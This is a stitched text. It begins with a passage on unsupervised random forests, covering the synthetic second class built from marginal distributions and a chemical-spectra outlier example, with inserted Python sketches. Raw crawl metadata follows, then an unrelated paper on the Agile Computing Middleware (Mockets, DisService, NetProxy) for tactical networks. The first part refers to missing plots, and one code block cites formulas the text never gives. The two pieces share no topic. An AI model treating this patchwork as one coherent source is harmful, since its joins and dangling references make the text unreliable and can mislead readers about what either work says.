Unlabeled data consists of N vectors \{x(n)\} in M dimensions. Using the iaddcl option in random forests, these vectors are assigned class label 1. Another set of N vectors is created and assigned class label 2. The second synthetic set is created by independent sampling from the one-dimensional marginal distributions of the original data. For example, if the value of the mth coordinate of the original data for the nth case is x(m,n), then a case in the synthetic data is constructed as follows: its first coordinate is sampled at random from the N values x(1,n), its second coordinate is sampled at random from the N values x(2,n), and so on. Thus the synthetic data set can be considered to have the distribution of M independent variables where the distribution of the mth variable is the same as the univariate distribution of the mth variable in the original data. A small sketch of this construction is given below.
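The following Python sketch builds the two-class problem that iaddcl sets up: class 1 is the original data, class 2 is sampled independently from each column's marginal distribution. It is an illustration of the construction described above, not the Fortran code.

```python
import numpy as np

def add_synthetic_class(x: np.ndarray, rng=None):
    """Given unlabeled data x of shape (N, M), return (data, labels) where
    class 1 = the original rows and class 2 = rows whose mth coordinate is
    drawn at random from the N observed values of the mth variable."""
    rng = np.random.default_rng(rng)
    n, m = x.shape
    synthetic = np.column_stack([rng.choice(x[:, j], size=n, replace=True)
                                 for j in range(m)])
    data = np.vstack([x, synthetic])
    labels = np.concatenate([np.ones(n, dtype=int), np.full(n, 2, dtype=int)])
    return data, labels

# Usage: run any classifier on (data, labels); a low two-class error indicates
# strong dependence between the original variables, as discussed below.
```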
When this two-class data is run through random forests, a high misclassification rate--say over 40%--implies that there is not much dependence structure in the original data. That is, its structure is largely that of $M$ independent variables--not a very interesting distribution. But if there is a strong dependence structure between the variables in the original data, the error rate will be low. In this situation, the output of random forests can be used to learn something about the structure of the data. The following is an example.

*An Application to Chemical Spectra*

Data graciously supplied by Merck consists of the first 468 spectral intensities in the spectra of 764 compounds. The challenge presented by Merck was to find small cohesive groups of outlying cases in this data. Using the iaddcl option, there was excellent separation between the two classes, with an error rate of 0.5%, indicating strong dependencies in the original data. We looked at outliers and generated this plot. This plot gives no indication of outliers. But outliers must be fairly isolated to show up in the outlier display. To search for outlying groups, scaling coordinates were computed. The plot of the 2nd vs. the 1st is below: This shows, first, that the spectra fall into two main clusters. There is a possibility of a small outlying group in the upper left hand corner. To get another picture, the 3rd scaling coordinate is plotted vs. the 1st. The group in question is now in the lower left hand corner and its separation from the body of the spectra has become more apparent.
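For completeness, here is a hedged sketch of the two computations used repeatedly above: turning a proximity matrix into scaling coordinates and into the per-case outlyingness measure. It assumes prox is a symmetric NumPy array with ones on the diagonal and labels holds the class of each case; it implements the formulas in the text, not the Fortran code itself.

```python
import numpy as np

def scaling_coordinates(prox: np.ndarray, n_coords: int = 2) -> np.ndarray:
    """Metric scaling: cv(n,k) = 0.5*(prox(n,k) - row mean - column mean + grand mean);
    the jth coordinate is sqrt(eigenvalue_j) * eigenvector_j for the largest eigenvalues."""
    row = prox.mean(axis=1, keepdims=True)
    cv = 0.5 * (prox - row - row.T + prox.mean())
    eigval, eigvec = np.linalg.eigh(cv)           # ascending order
    order = np.argsort(eigval)[::-1][:n_coords]
    lam = np.clip(eigval[order], 0.0, None)       # guard tiny negative values
    return eigvec[:, order] * np.sqrt(lam)

def outlyingness(prox: np.ndarray, labels: np.ndarray) -> np.ndarray:
    """out(n) = 1 / sum_k prox(n,k)^2 over k in n's class, normalized by the
    within-class median and mean absolute deviation; negatives set to zero."""
    out = np.zeros(len(labels))
    for c in np.unique(labels):
        idx = np.where(labels == c)[0]
        raw = 1.0 / (prox[np.ix_(idx, idx)] ** 2).sum(axis=1)
        med = np.median(raw)
        dev = np.mean(np.abs(raw - med)) or 1.0   # avoid dividing by zero
        out[idx] = np.maximum((raw - med) / dev, 0.0)
    return out
```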
{"Source-Url": "http://www.stat.berkeley.edu:80/~breiman/Using_random_forests_v3.00.pdf", "len_cl100k_base": 6899, "olmocr-version": "0.1.53", "pdf-total-pages": 28, "total-fallback-pages": 0, "total-input-tokens": 47311, "total-output-tokens": 8199, "length": "2e12", "weborganizer": {"__label__adult": 0.0003056526184082031, "__label__art_design": 0.0005078315734863281, "__label__crime_law": 0.00039839744567871094, "__label__education_jobs": 0.0015687942504882812, "__label__entertainment": 0.00011932849884033204, "__label__fashion_beauty": 0.0002238750457763672, "__label__finance_business": 0.0003447532653808594, "__label__food_dining": 0.0005016326904296875, "__label__games": 0.0006966590881347656, "__label__hardware": 0.0015163421630859375, "__label__health": 0.0007801055908203125, "__label__history": 0.0003113746643066406, "__label__home_hobbies": 0.0002474784851074219, "__label__industrial": 0.0006756782531738281, "__label__literature": 0.0003018379211425781, "__label__politics": 0.0003097057342529297, "__label__religion": 0.0005326271057128906, "__label__science_tech": 0.207275390625, "__label__social_life": 0.0001977682113647461, "__label__software": 0.050018310546875, "__label__software_dev": 0.73193359375, "__label__sports_fitness": 0.0003871917724609375, "__label__transportation": 0.0003314018249511719, "__label__travel": 0.00023484230041503904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29578, 0.01065]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29578, 0.7863]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29578, 0.90373]], "google_gemma-3-12b-it_contains_pii": [[0, 1681, false], [1681, 3585, null], [3585, 5705, null], [5705, 7410, null], [7410, 8822, null], [8822, 10271, null], [10271, 12679, null], [12679, 14114, null], [14114, 15446, null], [15446, 17035, null], [17035, 18373, null], [18373, 18724, null], [18724, 19921, null], [19921, 19921, null], [19921, 20970, null], [20970, 21370, null], [21370, 22500, null], [22500, 22852, null], [22852, 24021, null], [24021, 24850, null], [24850, 25452, null], [25452, 26228, null], [26228, 27004, null], [27004, 27719, null], [27719, 29004, null], [29004, 29226, null], [29226, 29446, null], [29446, 29578, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1681, true], [1681, 3585, null], [3585, 5705, null], [5705, 7410, null], [7410, 8822, null], [8822, 10271, null], [10271, 12679, null], [12679, 14114, null], [14114, 15446, null], [15446, 17035, null], [17035, 18373, null], [18373, 18724, null], [18724, 19921, null], [19921, 19921, null], [19921, 20970, null], [20970, 21370, null], [21370, 22500, null], [22500, 22852, null], [22852, 24021, null], [24021, 24850, null], [24850, 25452, null], [25452, 26228, null], [26228, 27004, null], [27004, 27719, null], [27719, 29004, null], [29004, 29226, null], [29226, 29446, null], [29446, 29578, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29578, null]], 
"google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29578, null]], "pdf_page_numbers": [[0, 1681, 1], [1681, 3585, 2], [3585, 5705, 3], [5705, 7410, 4], [7410, 8822, 5], [8822, 10271, 6], [10271, 12679, 7], [12679, 14114, 8], [14114, 15446, 9], [15446, 17035, 10], [17035, 18373, 11], [18373, 18724, 12], [18724, 19921, 13], [19921, 19921, 14], [19921, 20970, 15], [20970, 21370, 16], [21370, 22500, 17], [22500, 22852, 18], [22852, 24021, 19], [24021, 24850, 20], [24850, 25452, 21], [25452, 26228, 22], [26228, 27004, 23], [27004, 27719, 24], [27719, 29004, 25], [29004, 29226, 26], [29226, 29446, 27], [29446, 29578, 28]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29578, 0.0]]}
olmocr_science_pdfs
2024-12-12
2024-12-12
ecb4bfe2156749d822a9a6d3a58c44e73e39ae47
Agile Computing Middleware Support for Service-oriented Computing over Tactical Networks Niranjan Suri¹², Alessandro Morelli¹³, Jesse Kovach², Laurel Sadler², Robert Winkler² ¹Florida Institute for Human & Machine Cognition, Pensacola, FL, USA ²U.S. Army Research Laboratory, Adelphi, MD, USA ³University of Ferrara, Ferrara, Italy Abstract—Service-oriented architectures (SoAs) are a popular paradigm for enterprise and data center computing but normally do not perform well on tactical networks, which are often degraded in terms of bandwidth, reliability, latency, and connectivity. This paper presents the agile computing middleware and in particular a transparent network proxy and associated protocols that help address the impedance mismatch that occurs between SoAs and tactical and DIL (Disconnected, Intermittent, and Limited) networks. Keywords—Tactical Networks, Disconnected, Intermittent, and Limited Networks, Communications Middleware, Transport Protocols, Dissemination Services, Network Proxy I. INTRODUCTION Service-oriented architectures (SoAs) have evolved into a popular approach that supports rapid integration of multiple software components. SoAs provide well-defined interfaces and protocols to access their capabilities and hence offer many advantages including service reusability, composability using workflows, and rapid configuration and reconfiguration. Traditionally, SoAs have been deployed in enterprise and data center networks that are well connected with few constraints on bandwidth, latency, reliability, and availability. The popularity and success of SoAs in the enterprise environment has argued for their adoption in tactical network environments. However, tactical networks are typically wireless networks with little or no fixed infrastructure and are intermittently connected, bandwidth constrained, unreliable, and exhibit high and variable latencies. Tactical networks, as well as other Disconnected, Intermittent, and Limited (DIL) networks present many problems to the application and deployment of SoAs because SoAs were developed primarily for enterprise networks. SoAs typically use connection-oriented transport protocols such as TCP and encode messages in verbose, bandwidth intensive formats such as SOAP and XML. Additionally, TCP itself does not perform well on Tactical and DIL networks, further impacting the performance of SoAs. A detailed discussion of the network challenges and the requirements for SoAs to function effectively in tactical networks is discussed in [1]. This paper describes components of the agile computing middleware (ACM) that supports SoAs on tactical and DIL networks. The middleware addresses five primary challenges – resource and service discovery, transport protocols, disconnection support, resource allocation and coordination, and finally a transparent network proxy that helps to integrate legacy applications and systems. Given space limitations, this paper will focus primarily on the network proxy (NetProxy), which improves performance of legacy SoAs. Since NetProxy relies on other components in the middleware that provide transport services and disconnection support, those components are also briefly described. The experimental results presented in the evaluation section towards the end of the paper only focus on NetProxy. II. 
MIDDLEWARE OVERVIEW

The agile computing middleware (ACM) has been motivated by the challenges posed by tactical and DIL networks and provides a comprehensive set of capabilities including network monitoring, data transport, data dissemination, resource and service discovery, transparent network proxy, and network visualization. Figure 1 shows the key components with a very short label identifying the purpose of each component. The components of this middleware have been primarily developed using C++ and ported to Linux, Win32, and in some cases, the Android environment. Wrappers are available for applications that are written in Java and C#. Furthermore, many of these components are available as open source under the GPLv3 license and currently hosted on GitHub [2]. The following sections describe Mockets, DisService, and the ACM NetProxy in more detail. Other components relevant to SoAs in tactical networks include the Group Manager component, which provides discovery services [3], and AgServe, which realizes a dynamic SoA with service migration [4].

[Figure 1: Components of the Agile Computing Middleware]

III. MOCKETS

Mockets (for mobile sockets) is a transport protocol designed to replace TCP and UDP and targeted for DIL networks. Mockets itself can operate over UDP for IP networks, and can also operate over non-IP networks using packet adaptors. Mockets replaces the TCP congestion control and reliable transmission algorithms with alternate, custom implementations that are designed for DIL networks. Numerous configurable options allow Mockets to be easily adapted to a variety of network links and radios. Unlike TCP, Mockets provides a message-oriented interface, which allows Mockets to distinguish between messages. Being able to identify message boundaries and messages allows Mockets to treat individual messages differently, which is not possible with a byte-stream-oriented model such as TCP. Mockets provides four different classes of service, which allows applications to choose options for reliability and sequencing for each message that they transmit. TCP only provides the equivalent of reliable and sequenced, which is the most expensive choice in terms of bandwidth and latency. Experience has shown that applications rarely need these semantics, but use them because those are the semantics provided by TCP. Many times, applications need sequencing but not reliability (e.g., audio or video streaming) and many times they need reliability but not sequencing. Other relevant capabilities provided by Mockets include prioritization of messages, policy-based enforcement of bandwidth constraints, and message replacement. The last capability allows an application to flush and replace old messages with newer versions. Message replacement is particularly useful when applications generate repeated messages (e.g., status update messages). With TCP, these messages get enqueued when the network link goes down. Since TCP provides no feedback to the application, the application would continue to generate these periodic messages, which continue to get enqueued. When the network link is restored or is available again, all of these old messages would be sent unnecessarily. On the other hand, with Mockets, the application can assign a tag for each type of message, and then request that a new update replace previous messages with the same tag.
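The sketch below illustrates the tag-based replacement idea with a toy outbound queue. The class and method names are hypothetical and are not the actual Mockets API; they only show the queue behaviour the text describes, where a new status update displaces any older, still-unsent update with the same tag.

```python
from collections import OrderedDict

class ReplacingSendQueue:
    """Toy outbound queue: at most one pending message per tag (hypothetical)."""
    def __init__(self):
        self._pending = OrderedDict()   # tag -> latest unsent payload
        self._untagged = []

    def enqueue(self, payload: bytes, tag: str | None = None) -> None:
        if tag is None:
            self._untagged.append(payload)
        else:
            # Replace any older, still-unsent message carrying the same tag.
            self._pending.pop(tag, None)
            self._pending[tag] = payload

    def drain(self):
        """Called when the link comes back: only the newest update per tag goes out."""
        batch = self._untagged + list(self._pending.values())
        self._untagged.clear()
        self._pending.clear()
        return batch

# While disconnected, three position updates with the same tag collapse to one.
q = ReplacingSendQueue()
for i in range(3):
    q.enqueue(f"position-update {i}".encode(), tag="blue-force-track")
assert q.drain() == [b"position-update 2"]
```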
That results in the most recent message being sent out when a connection is restored, which both reduces bandwidth utilization as well as the latency in message delivery. Experimental results that show the benefits of message replacement are provided in [5]. Another important capability offered by mockets is the ability to dynamically rebind an endpoint of an open connection in a manner that is transparent to the application. For example, if a node switches networks and as a consequence switches IP addresses, mockets could transparently rebind to the new IP address without any interruption of connection from the perspective of any of the applications. Unlike Mobile IP [6], mockets does not need a home node to forward traffic. Finally, mockets exports detailed statistics about the status of the network link, including queue sizes, reliability, throughput, and latency. All of these statistics can be utilized by other middleware layers or the application to adjust their behavior based on the performance of the underlying network. This is in contrast with TCP, which traditionally tries to isolate the application from the behavior of the underlying network. For the purposes of Service-oriented Computing over DIL networks, mockets has been integrated into NetProxy, which allows existing COTS applications to benefit from the performance improvements offered by Mockets. NetProxy is further described in section V. IV. DiSService DiSService is a peer-to-peer disruption tolerant dissemination service that provides many fundamental capabilities for DIL environments. DiSService supports store and forward delivery of data and caches data wherever possible in the network, thereby making it disruption tolerant and improving availability of data. The opportunistic listening capability of DiSService, described by patent [7], is of particular relevance to vehicular networks, as it addresses challenges such as temporary loss of connectivity due to tunnels and other “urban canyons.” DiSService also supports the notion of hierarchical groups to organize the information being disseminated and to be efficient about delivery of information. Subscriptions allow clients to express interest in particular groups. Information is published in the context of a group and is delivered to other nodes where applications have subscribed to those groups. DiSService, like mockets, provides a variety of classes of services. The one major difference is that mockets is a point-to-point communication protocol (like TCP) whereas DiSService is a point-to-multipoint communication protocol. Therefore, there could be many receivers for messages that are transmitted by one node. With DiSService, the class of service is specified by the subscriber (the receiver) for each group. For each group, a subscriber may specify whether sequencing is desired, whether messages should be reliable, and whether missing messages should be requested. Unlike mockets, which uses a Selective Acknowledgement (SAck) mechanism for reliability, DiSService uses a Negative Acknowledgement (NAck) mechanism for reliability. Therefore, it is up to each receiver to determine, based on the class of service desired, whether to request for missing pieces (fragments) of a message that has been published (and whether to request complete messages that might have been missed in their entirety). The disruption tolerance capability of DiSService provides a particularly useful foundation for Service-oriented architectures. 
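The receiver-driven recovery just described can be sketched in a few lines. This is only an illustration of the NAck idea; the function names are invented and this is not the DisService wire protocol.

```python
def missing_fragments(received_ids, total_fragments):
    """Receiver-side view of a published message split into `total_fragments`
    pieces: return the fragment ids that still need to be requested."""
    return sorted(set(range(total_fragments)) - set(received_ids))

def build_nack(msg_id, received_ids, total_fragments, want_reliable=True):
    """Build a NAck request only if the subscription asked for reliability."""
    gaps = missing_fragments(received_ids, total_fragments)
    if not want_reliable or not gaps:
        return None
    return {"msg_id": msg_id, "request_fragments": gaps}

# Fragments 2 and 5 were lost on the radio link; the subscriber asks for them.
print(build_nack("grp.blue/42", received_ids=[0, 1, 3, 4, 6, 7], total_fragments=8))
# {'msg_id': 'grp.blue/42', 'request_fragments': [2, 5]}
```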
Each service invocation may be embodied inside a DiSService message that is pushed by the client to the node hosting the service to be invoked. No end-to-end connectivity is required in this scenario for the service request message to reach the provider node. When the message is received, middleware on the provider node extracts the service invocation parameters from the message and invokes the service accordingly. When the result is obtained, it is in turn embodied in a new message and pushed by the provider node back to the client node. Figure 2 shows a typical scenario for service invocation via DiSService, where the invocation request and the reply may be forwarded through any number of intermediate nodes (also running DiSService). Workflows can be realized using an extension of the same mechanism, where intermediate results are embedded into messages and pushed between the nodes using DisService. Figure 2: Service Invocation over Disrupted Links with DisService V. NetProxy The ACM NetProxy is the component responsible for providing transparent integration between SoA systems and the middleware. Among its many features, the most notable include network protocol remapping, connection multiplexing, data compression, intelligent buffering, flow prioritization, and packets consolidation. The support for protocol remapping in NetProxy plays a particularly important role, as it allows forwarding (part of) the traffic generated by SoA applications over Mockets and DisService transparently. This is a key step towards enabling the reuse of SoA components in DIL networks, because it gives applications access to the features of ACM without making any changes to their source code. In addition, NetProxy supports two operational modes to fit better into different network configurations and to meet various user requirements. NetProxy works by intercepting packets generated by the applications before they are sent over the network. This gives NetProxy full control of all the different traffic flows going through it, without the need to change any network configuration or any parameter of the proxied nodes/applications. After their interception, NetProxy proceeds by analyzing those packets to extract useful pieces of information (source and/or destination IP address, transport protocol used, type of application/service, etc.). Other ACM components can provide further data, e.g. Mockets statistics can give an insight on the current network status, available bandwidth, and measured latency, which will enrich and complement the information extracted from the intercepted packets. Based on all of this information, on the status of the internal buffers, and on the configuration options specified, the decision making building block of the NetProxy will take the most appropriate actions to satisfy applications’ requirements under the constraints imposed by the available network resources. If NetProxy is configured to perform any type of protocol remapping, a second instance on the other end of the communication is necessary to apply the inverse remapping. This ensures complete application transparency, it avoids any compatibility issue, and it removes any dependency from other ACM components. The operational modes chosen for the two instances do not have to match. Supported operational modes, Host Mode (HM) and Gateway Mode (GM), differ in the way they intercept the traffic and in the role that the NetProxy assumes in the network. 
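Before turning to the two operational modes, the per-flow decision step just described can be sketched as follows. The field names, port checks, and thresholds are invented for illustration and are not NetProxy's actual configuration options.

```python
# Hypothetical per-flow decision logic in the spirit of NetProxy's
# decision-making block: choose a transport remapping and a compression
# codec from intercepted packet headers and the current link estimate.

def choose_forwarding(proto, dst_port, link_bandwidth_kbps, link_loss_pct):
    decision = {"remap": None, "compress": None}

    if proto == "TCP":
        # Lossy links punish TCP congestion control, so remap onto a
        # message-oriented, loss-tolerant transport (Mockets in the paper).
        decision["remap"] = "mockets" if link_loss_pct > 1.0 else "tcp-passthrough"
    elif proto == "UDP":
        decision["remap"] = "udp-passthrough"

    # Verbose SOAP/XML traffic (crudely keyed on HTTP ports here) compresses
    # well; prefer a cheaper codec when bandwidth is not the bottleneck.
    if dst_port in (80, 8080):
        decision["compress"] = "zlib" if link_bandwidth_kbps >= 256 else "lzma"

    return decision

print(choose_forwarding("TCP", 8080, link_bandwidth_kbps=1000, link_loss_pct=7.0))
# {'remap': 'mockets', 'compress': 'zlib'}
```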
When operating in HM, as shown in Figure 3, a copy of the NetProxy is installed on any nodes that run SoA applications in need of proxy support. It follows that multiple instances might be running on different nodes of the network. This mode also requires the installation of a virtual network interface on those nodes, so that applications’ packets cannot reach the real network unless they go through the NetProxy. Conversely, when running in GM as shown in Figure 4, the NetProxy assumes it is installed on a single node of the network equipped with two network interfaces (labeled “internal” and “external”), from which it can proxy all the traffic coming in and going out from the network. The two modes have different advantages and liabilities. HM simply requires the installation of a piece of software on every node that runs applications needing to be proxied; however, each instance of the ACM component will only have a local view of the traffic and of the network conditions. On the other hand, GM requires NetProxy to be installed on a gateway node of the local network, which might not be possible because of the network architecture or authorization issues. However, running NetProxy on a gateway node is preferred in terms of having the best possible view of the traffic generated and the network status. It is entirely possible to have the equivalent of the NetProxy running on a router or wireless network device of some sort. For example, in a vehicular networking scenario, it is envisioned that the vehicle has a local area network (LAN), which then connects to a wireless router / device that provides off-vehicle connectivity. The NetProxy in GM would either run between the LAN and the wireless device, or could be directly integrated into the wireless device for complete transparency. Figure 3: NetProxy Running in Host Mode VI. EXPERIMENTAL RESULTS This section presents the results collected during two different experiments involving the NetProxy and other associated protocols. The first experiment is designed to reproduce the issues that SoA applications face when running in tactical networks and several tests were run in an emulated environment to collect the necessary data from it. The results of the second experiment, instead, come from a recent technical evaluation event: data represents a real use case and they were collected directly in the field, during the event. For our first experiment, we used an enhanced version of the Mobile Ad-hoc Network Emulator (MANE) [8], a tool designed to reproduce the characteristics of unreliable environments such as tactical networks, to set up the connectivity between the two nodes involved in the first experiment. Those nodes are part of the NOMADS testbed, which comprises 96 HP DL140 servers (Dual Xeon Dual Core CPUs at 3.06Ghz, with 4GB of RAM each) connected via a 100Mbps Ethernet LAN. MANE can manage bandwidth, latency, and reliability for both directions of each link, and thus it permits evaluating different systems and configurations in a reproducible, laboratory controlled environment. The reliability parameter in MANE is a complementary measure of the Packet Error Rate (PER): for instance, 90% reliability is equal to a PER of 10%. For the purposes of testing the performance of NetProxy, we had a client application on one node of the testbed generate an HTTP SOAP request, send it to a Web Server located on a second node, and finally wait for the response. 
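Since MANE's reliability parameter is the complement of the PER, a quick back-of-envelope calculation shows why even a few percent of packet loss is punishing for an exchange that spans several TCP segments. The 20-segment figure is an assumption made only for illustration, and the calculation ignores retransmissions and congestion control.

```python
# MANE "reliability" is 1 - PER: 90% reliability means each packet is
# dropped with probability 0.10.  For a request/response spread over
# several segments, the chance that no segment is lost (so TCP never has
# to recover) falls quickly with the segment count.

def per(reliability_pct):
    return 1.0 - reliability_pct / 100.0

def p_all_delivered(reliability_pct, n_segments):
    return (reliability_pct / 100.0) ** n_segments

for r in (95, 93, 90, 87):   # the reliability values used in the tests below
    print(f"reliability {r}%  PER {per(r):.2f}  "
          f"P(20-segment exchange unscathed) {p_all_delivered(r, 20):.2%}")
```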
To emulate different conditions of a tactical scenario, we kept the link bandwidth set to 1 Mbps in both directions while we ran several tests with different values of the reliability parameter: 87%, 90%, 93%, and 95%. The client application repeated each request 50 times under the same link conditions before the next reliability value was set in MANE. The whole experiment was repeated four times, changing the way client and server connected to each other: using TCP, using NetProxy to remap TCP over Mockets (referred to as “NP + Mockets” in the remainder of the paper), using NP + Mockets with the lzma compression feature of NetProxy enabled (NP + Mockets – LZMA), and finally using NP + Mockets with zlib compression (NP + Mockets – ZLIB). Both instances of NetProxy were running in Host Mode. Figure 5 shows the results of the experiment described above. TCP shows the lowest throughput, and remapping it over Mockets through NetProxy already produces a significant improvement in performance. Several reasons contribute to this result. First of all, Mockets handles packet loss much better than TCP, which attributes every loss to network congestion and therefore triggers congestion control even when it is not necessary. Moreover, NetProxy multiplexes all the traffic directed to a single node onto the same connection and keeps that connection open for consecutive requests that may come from various applications; in contrast, individual applications usually do not keep their TCP connections open once a request has been served, which means that every new request forces TCP to go through its slow-start phase again. Part of the improvement is also due to the intelligent buffering of NetProxy combined with Mockets, which results in packets with larger payloads and thereby reduces protocol overhead. However, enabling compression yielded a much larger gain in measured throughput. The verbosity of the HTTP and SOAP protocols lets compression algorithms work very efficiently, substantially reducing the amount of data that needs to be transferred. Despite the better compression ratio of the lzma algorithm compared to zlib, NP + Mockets – ZLIB showed the highest throughput. This is due to the greater computational cost of lzma: the extra time spent compressing exceeds the transmission time saved by its slightly better compression ratio. Figure 5: Performance Results of Service Invocation with NetProxy The second experiment consisted of a practical demonstration in the field. Four networks were involved in the experiment, namely NetA through NetD, and only NetA had a satellite link to each of the other networks. Direct connections between any of the networks NetB through NetD were therefore not possible, and all communications between nodes in two of those networks had to go through NetA. All satellite links have a latency of 2 seconds, hence an RTT of 4 seconds, and a bandwidth of 32 KB/s (256 kbps). NetProxy operating in Gateway Mode was installed on a dedicated Ubuntu 14.04 64-bit Linux machine in each of the four networks, and all incoming and outgoing traffic had to go through those nodes. This gave NetProxy complete visibility into, and control over, the traffic generated within each network and the status of the satellite link.
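Returning briefly to the compression comparison from the first experiment: the zlib-versus-lzma trade-off can be reproduced with the Python standard library alone. The SOAP payload below is made up, so the absolute numbers will differ from those behind Figure 5, but the pattern (lzma compresses slightly harder while costing noticeably more CPU time) is the point.

```python
import lzma
import time
import zlib

# A deliberately repetitive, SOAP-like payload: verbose XML markup is what
# makes compression so effective in this scenario.
soap = (b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        b"<soap:Body><getTrack><unit>alpha</unit><lat>38.99</lat>"
        b"<lon>-77.02</lon></getTrack></soap:Body></soap:Envelope>") * 200

for name, compress in (("zlib", zlib.compress), ("lzma", lzma.compress)):
    t0 = time.perf_counter()
    out = compress(soap)
    dt = time.perf_counter() - t0
    print(f"{name}: {len(soap)} -> {len(out)} bytes "
          f"(ratio {len(soap) / len(out):.1f}x) in {dt * 1000:.2f} ms")
```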
Tcpdump (http://www.tcpdump.org/) was used to capture all packets on both the internal and external network interfaces of the machines running NetProxy. Due to space limitations, only a subset of the results are presented. Two graphs show the effects of NetProxy on the number of packets generated and on the bandwidth usage, filtering out all traffic but that going from NetA to NetB. Statistical analysis of the other connections, in both directions, showed very similar results. On the X axis of the graphs is the time in seconds. Due to the long duration of the experiment (several hours) and the consequent overwhelming amount of data collected, only a small subset was selected for detailed presentation. This particular data sample is about 80 seconds long and starts at 680s after the beginning of the experiment. Figure 6 shows the number of packets sent every second by nodes of NetA to nodes of NetB (in red) against the number of packets actually generated every second by the NetProxy in NetA and transmitted over the satellite link to the NetProxy in NetB (in black). As can be seen clearly, the red bars are always significantly taller than the black ones, indicating a much lower resource consumption when using NetProxy. Actual packet counts indicated an improvement of 1.77x (in terms of reduction of the number of packets). Figure 7 shows a similar comparison – but measuring the bandwidth utilization (the unit of measurement is in bytes per second). Actual data analysis shows that the improvement (in terms of reduction of bandwidth) was approximately 2.44x. VII. SUMMARY AND FUTURE WORK This paper has described the agile computing middleware (ACM) and its application to supporting Service-oriented Architectures (SoAs) over tactical and DIL networks. NetProxy is the primary component that addresses the challenges of enabling legacy applications and SoAs to achieve better performance over tactical networks. NetProxy integrates the mockets transport protocol that replaces TCP and DisService for disruption-tolerant dissemination. Experimental results both in the laboratory and the field show the significant improvement in performance that can be achieved using this middleware capability. All of the components described in this paper are available via GPLv3 licensing from GitHub [2]. Future work in this area consists of further enhancements to SoA capabilities. In particular, the AgServe component is being updated to support dynamic service deployment and service migration by discovering and exploiting communication and computation resources in a dynamic tactical / DIL network environment. ACKNOWLEDGMENT This work is supported by the U.S. Army Research Laboratory under cooperative agreement W911NF-11-2-0095. REFERENCES
{"Source-Url": "https://de.unife.it/en/research/research-1/information-technology/computer-science/distributed-systems-group/papers/AgileComputingMiddlewareSupportforServiceorientedComputingoverTacticalNetworks.pdf/at_download/file", "len_cl100k_base": 4424, "olmocr-version": "0.1.50", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 15367, "total-output-tokens": 5294, "length": "2e12", "weborganizer": {"__label__adult": 0.00045013427734375, "__label__art_design": 0.00031566619873046875, "__label__crime_law": 0.0006384849548339844, "__label__education_jobs": 0.0005512237548828125, "__label__entertainment": 0.00016570091247558594, "__label__fashion_beauty": 0.00020873546600341797, "__label__finance_business": 0.0005779266357421875, "__label__food_dining": 0.0004024505615234375, "__label__games": 0.0006756782531738281, "__label__hardware": 0.005298614501953125, "__label__health": 0.0008392333984375, "__label__history": 0.0005083084106445312, "__label__home_hobbies": 8.958578109741211e-05, "__label__industrial": 0.00107574462890625, "__label__literature": 0.0003025531768798828, "__label__politics": 0.0004589557647705078, "__label__religion": 0.0004734992980957031, "__label__science_tech": 0.45947265625, "__label__social_life": 0.00011962652206420898, "__label__software": 0.041839599609375, "__label__software_dev": 0.481689453125, "__label__sports_fitness": 0.00048422813415527344, "__label__transportation": 0.0029144287109375, "__label__travel": 0.0003631114959716797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25098, 0.01839]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25098, 0.27782]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25098, 0.91753]], "google_gemma-3-12b-it_contains_pii": [[0, 4780, false], [4780, 11073, null], [11073, 15593, null], [15593, 19866, null], [19866, 25098, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4780, true], [4780, 11073, null], [11073, 15593, null], [15593, 19866, null], [19866, 25098, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25098, null]], "pdf_page_numbers": [[0, 4780, 1], [4780, 11073, 2], [11073, 15593, 3], [15593, 19866, 4], [19866, 25098, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25098, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
e9e019ef8ba895e58361a3757335356569f49976
